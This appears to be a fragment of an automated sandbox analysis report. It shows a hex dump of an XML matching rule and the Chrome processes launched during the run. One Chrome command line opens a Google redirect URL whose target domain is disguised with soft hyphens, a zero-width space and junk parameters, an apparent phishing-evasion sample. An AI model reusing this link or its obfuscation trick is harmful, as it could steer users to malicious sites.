                                                                                                                                                                2024-11-23 19:37:05 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 50 70 5d 5b 45 65 5d 5b 4e 6e 5d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 43 63 5d 5b 4b 6b 5d 20 5b 46 66 5d 5b 4f 6f 5d 5b 55 75 5d 5b 4e 6e 5d 5b 44 64 5d 5b 41 61 5d 5b 54 74 5d 5b 49 69 5d 5b 4f 6f 5d 5b 4e 6e 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49
                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120659" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <SR T="2" R="([Oo][Pp][Ee][Nn][Ss][Tt][Aa][Cc][Kk] [Ff][Oo][Uu][Nn][Dd][Aa][Tt][Ii][Oo][Nn])"> <S T="1" F="1" M="I


                                                                                                                                                                Click to jump to process

                                                                                                                                                                Click to jump to process

                                                                                                                                                                Click to jump to process

                                                                                                                                                                Target ID:0
                                                                                                                                                                Start time:14:35:37
                                                                                                                                                                Start date:23/11/2024
                                                                                                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                                                                                                                                Imagebase:0x7ff76e190000
                                                                                                                                                                File size:3'242'272 bytes
                                                                                                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:low
                                                                                                                                                                Has exited:false

                                                                                                                                                                Target ID:2
                                                                                                                                                                Start time:14:35:39
                                                                                                                                                                Start date:23/11/2024
                                                                                                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2296 --field-trial-handle=2204,i,16069882078136345391,354034326373228227,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                Imagebase:0x7ff76e190000
                                                                                                                                                                File size:3'242'272 bytes
                                                                                                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:low
                                                                                                                                                                Has exited:false

                                                                                                                                                                Target ID:3
                                                                                                                                                                Start time:14:35:41
                                                                                                                                                                Start date:23/11/2024
                                                                                                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.google.co.kr/url?url=https://hrtyuytitwagtxswxzqxpcm&jtdm=hjstxxb&qhwocq=elw&vrszx=mrursi&rtz=qksmlok&sdyxm=kxlpun&hnkj=iujyvng&vochgqf=ylsd&pkhfd=vyifcj&nymdhak=ffn&ylzv=xpddvxaj&zoadnebgoj=rccejsmuqd&q=amp/hmf1bnz.s%C2%ADlf%C2%ADpg%C2%ADq%C2%ADq%C2%ADwzu%C2%ADx%C2%ADppns%C2%ADc%C2%ADs%C2%AD.com%E2%80%8B/n7brnx1iy&lbgq=ihcrvpx&isffrcc=xjcvvbbd&hokv=buitobfj&nfzezydbgm=lhtjhglyxx&pjwu=tdsgcse&cesnzrb=ekoykarj&ifpv=yabmwecd&acyeqkflup=bacwibnnwl&dovx=vqvcdxk&rwbvdtj=khlezois&efgx=ktfpexjt&iqggbgjmwh=cvqmvfdelx&gqsh=ghsdgye&hipceti=hpqeesqk&hkvbucxuvo=drwoirzwsq&dril=qbpemxo&xziwtam=tdvywqlj&nndiwyldry=kjqbehmdbj&kqef=faiqetj&peigggc=vbyfdxky&fstmbbtmkx=rjxugltfmc&rpws=borxqez&rijvxqj=ntedqhtd&wohxxxgtmq=jpiozpkrbp&cxah=gcmtksp&tzidqah=syxnwioo&szzishkfke=xmnmodwwoc&xmif=xdxtrqz&ajzcojq=fmtqkshw&gkmh=vmwdknp&xvlhpuf=zkhqqziq&rvfh=igbqint&gdnzlky=hyzlhjke&dqkq=ophpttl&yoamsuz=cuykisoc&frzr=lajcnwi&chdmjpw=hymhkhbw&wnxy=zwkomqb&duxkrfq=asjrwcgu&fzya=hrpcnke&hxrusxm=foudbois&yqgm=uhfvxoo&uynyplq=iryzkatx&qfzs=stmleud&vkbxzkf=hxgbjzit&dnro=vjxntck&kfrldgj=vpyfihbn&nsko=sdzidzb&unudtuz=mnvrwokv&lisf=zxdfari&tdyzrah=otrtzuun&rfza=trokalr&vkfduyc=wpwvnxpe&jjsq=pgkbofh&uatnbjp=gtwiypfq&zilu=kagobvs&jqfufkw=bckrzetp&tjng=jgmmmod&fvdtpsk=vlyzfjep&mgoi=fklhysh&llyljdv=jxpogtdn&gcjv=vjlzkuf&erlhvti=peuprtov&kbxk=jviffkg&lklbxhl=uhzpnzfw&upaw=gfmiehp&ismxijp=hmwbsmgj&zdkc=kodikna&njllvzf=oodglyrw&urdk=cktezyn&vmqhwgh=kqcbhffu&riqy=tlnbqzr&nmlgrkn=inyeynzg&vebu=pwpghzr&ckpmyoc=tmeufjen&otic=svrqsdo&tbwzub"
                                                                                                                                                                Imagebase:0x7ff76e190000
                                                                                                                                                                File size:3'242'272 bytes
                                                                                                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:low
                                                                                                                                                                Has exited:true

                                                                                                                                                                No disassembly